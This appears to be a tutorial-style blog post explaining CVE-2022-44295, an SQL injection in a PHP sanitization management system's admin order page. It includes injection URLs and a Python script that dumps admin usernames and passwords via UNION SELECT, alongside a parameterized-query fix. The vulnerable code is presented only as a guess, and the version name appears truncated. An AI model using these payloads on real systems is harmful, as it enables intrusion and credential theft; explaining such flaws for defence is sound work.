CVE-2022-44295 - SQL Injection in Sanitization Management System v1. Explained with Exploit Steps

Sanitization Management System v1. is a web-based solution used by facilities and organizations to track, assign, and manage sanitation tasks and teams. Unfortunately, in 2022, a severe security flaw was identified, allowing attackers to compromise the database via a special attack called SQL Injection. This vulnerability is tracked as CVE-2022-44295.

In this post, we'll break down what this vulnerability is, how it can be exploited, and show you example code. We’ll keep things simple so even beginners can understand.

What is CVE-2022-44295?

CVE-2022-44295 is a SQL Injection vulnerability found in Sanitization Management System v1., specifically in the admin order assignment script:

/php-sms/admin/orders/assign_team.php?id=

An attacker can manipulate the id parameter and force the system to run unintended SQL commands. They could, for example, read sensitive data, change, or even delete database content.

How SQL Injection Works

SQL Injection happens when an application doesn’t properly check user inputs before adding them to a database query. This lets attackers "inject" malicious SQL commands as part of their input.

Here’s what the original vulnerable code might look like inside assign_team.php

<?php
// Vulnerable code snippet
include("db_connect.php"); 

$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE id = $id";
$result = mysqli_query($con, $sql);
// ... process results ...
?>

Notice: The code takes the id straight from the URL and puts it into the database command without checking or sanitizing it.

A normal user might visit

http://example.com/php-sms/admin/orders/assign_team.php?id=5

But an attacker could use

http://example.com/php-sms/admin/orders/assign_team.php?id=5%20OR%201=1

This changes the SQL to

SELECT * FROM orders WHERE id = 5 OR 1=1

Now, all orders will be selected because 1=1 is always true.

Attackers could even dump sensitive data

http://example.com/php-sms/admin/orders/assign_team.php?id=%20UNION%20SELECT%201,username,password,4%20FROM%20admins

This would sneak in a query that returns usernames and passwords from the admins table!

Here’s a Python script to automate this exploit and dump admin usernames and passwords

import requests

URL = "http://target/php-sms/admin/orders/assign_team.php";
payload = " UNION SELECT 1,username,password,4 FROM admins"

r = requests.get(URL, params={"id": payload})

print(r.text)

*Replace http://target with the real site URL. Use only on systems you own or have permission to test!*

Here’s a safe way using PHP and mysqli

$stmt = $con->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();

This code prevents attackers from injecting extra SQL.

References and Sources

- NVD Entry for CVE-2022-44295
- Exploit Database PoC #51020
- Common vulnerabilities: SQL Injection explained

Final Thoughts

CVE-2022-44295 is a classic example of why secure coding practices (like input validation) are so important. Exploits like these can lead to full system compromise. If you use Sanitization Management System v1., patch your system and check for suspicious access immediately.

Timeline

Published on: 11/30/2022 18:15:00 UTC
Last modified on: 12/01/2022 02:27:00 UTC